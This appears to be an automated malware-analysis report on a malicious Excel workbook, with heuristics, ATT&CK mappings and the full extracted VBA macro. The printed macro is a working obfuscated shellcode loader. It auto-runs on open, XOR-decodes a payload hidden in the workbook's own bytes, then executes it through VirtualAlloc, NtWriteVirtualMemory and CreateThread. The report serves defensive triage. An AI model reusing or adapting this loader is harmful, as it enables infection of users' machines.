MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution: Malicious Macro
The file contains both VBA and Excel 4.0 (XLM) macros, with Workbook_Open and Document_Open heuristics firing. The VBA macro attempts to use VirtualAlloc and CreateThread, indicating it likely allocates memory and executes shellcode. The presence of obfuscated script names and the use of Windows API calls suggest a downloader or dropper functionality.
Heuristics 6
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() raHdABOeZHybFUqnxMvUML -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4702 bytes |
SHA-256: dade35c58122e76a9a8383fdb73fd13a8d23a273f6b5a2268ffacbb32f2b52f7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
39 of 71 identifiers look randomly generated (e.g. 'haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJX') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As LongPtr, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As LongPtr
Private Declare PtrSafe Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As LongPtr, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As LongPtr, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As LongPtr, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As LongPtr, ByRef VooEsilLrzmcPJskIeB As LongPtr) As LongPtr
#Else
Private Declare Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As Long, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As Long
Private Declare Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As Long, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As Long, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As Long, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As Long, ByRef VooEsilLrzmcPJskIeB As Long) As Long
#End If
Const BQtsEMXQdQ = &H1000
Const kxiEEplHEtFygBTjeOIiho = &H40
Public Sub raHdABOeZHybFUqnxMvUML()
Dim VuQRdWV() As Byte
VuQRdWV = CokBrkmkOTTa(ActiveWorkbook.FullName)
Dim jyjPJ As String
jyjPJ = StrConv(VuQRdWV, 64)
Dim CKEcHyHGwDDAHLySoXFU
CKEcHyHGwDDAHLySoXFU = Split(jyjPJ, "haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJXfIwlwlknBMgwIHAlhLCbaGQMossoDcJfVDKYAIBhbiHASwniQUiBvHWz")
Dim JKKLidHoCwfHIVbRSfnyoYm As String
Dim USPbaXBGT As String
Dim XefQKouerNuRsviD As String
USPbaXBGT = StrConv(StrConv(CKEcHyHGwDDAHLySoXFU(UBound(CKEcHyHGwDDAHLySoXFU)), 64), 128)
XefQKouerNuRsviD = Mid$(USPbaXBGT, 3, Len(USPbaXBGT))
JKKLidHoCwfHIVbRSfnyoYm = iEBUuBXDakOwcUky("JWeSWJycaBeXCLyjuaSYqURekx", XefQKouerNuRsviD)
#If VBA7 Then
Dim zXQUeXNBXvoNaUW As LongPtr
Dim gWUTRWrnQLDT As LongPtr
#Else
Dim zXQUeXNBXvoNaUW As Long
Dim gWUTRWrnQLDT As Long
#End If
zXQUeXNBXvoNaUW = wqieosdkWGFhPYNFGvppOln(0, Len(JKKLidHoCwfHIVbRSfnyoYm), BQtsEMXQdQ, kxiEEplHEtFygBTjeOIiho)
gWUTRWrnQLDT = NtWriteVirtualMemory(-1, zXQUeXNBXvoNaUW, JKKLidHoCwfHIVbRSfnyoYm, Len(JKKLidHoCwfHIVbRSfnyoYm), 0)
gWUTRWrnQLDT = bqEDQaVZHp(0, 0, zXQUeXNBXvoNaUW, 0, 0, 0)
End Sub
Public Function CokBrkmkOTTa(ByVal qyuarThySZQwawRswxLxviUTfWs As String) As Byte()
Dim USPbaXBGT As Long
Dim XefQKouerNuRsviD() As Byte
USPbaXBGT = FreeFile
If LenB(Dir(qyuarThySZQwawRswxLxviUTfWs)) Then
Open qyuarThySZQwawRswxLxviUTfWs For Binary Access Read As USPbaXBGT
ReDim XefQKouerNuRsviD(LOF(USPbaXBGT) - 1&) As Byte
Get USPbaXBGT, , XefQKouerNuRsviD
Close USPbaXBGT
Else
Err.Raise 53
End If
CokBrkmkOTTa = XefQKouerNuRsviD
Erase XefQKouerNuRsviD
End Function
Public Sub Document_Open()
raHdABOeZHybFUqnxMvUML
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function iEBUuBXDakOwcUky(AGrFyFzaFEPdAtSxztcsDCCinJdFI As String, TjsuUBlTJYbT As String) As String
Dim WhAzRWYDAiguXdjrOCUrqLGK As Long
Dim yrlFJeq As String
Dim NGaNjmJKLsbmZXxcBVwhBy As Integer, iwQHCxWirTNQVPyGsf As Integer, a As Long
For WhAzRWYDAiguXdjrOCUrqLGK = 1 To Len(TjsuUBlTJYbT)
a = WhAzRWYDAiguXdjrOCUrqLGK Mod Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
If a = 0 Then a = Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
NGaNjmJKLsbmZXxcBVwhBy = Asc(Mid$(TjsuUBlTJYbT, WhAzRWYDAiguXdjrOCUrqLGK, 1))
iwQHCxWirTNQVPyGsf = Asc(Mid$(AGrFyFzaFEPdAtSxztcsDCCinJdFI, a, 1))
yrlFJeq = yrlFJeq + Chr(NGaNjmJKLsbmZXxcBVwhBy Xor iwQHCxWirTNQVPyGsf)
Next WhAzRWYDAiguXdjrOCUrqLGK
iEBUuBXDakOwcUky = yrlFJeq
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.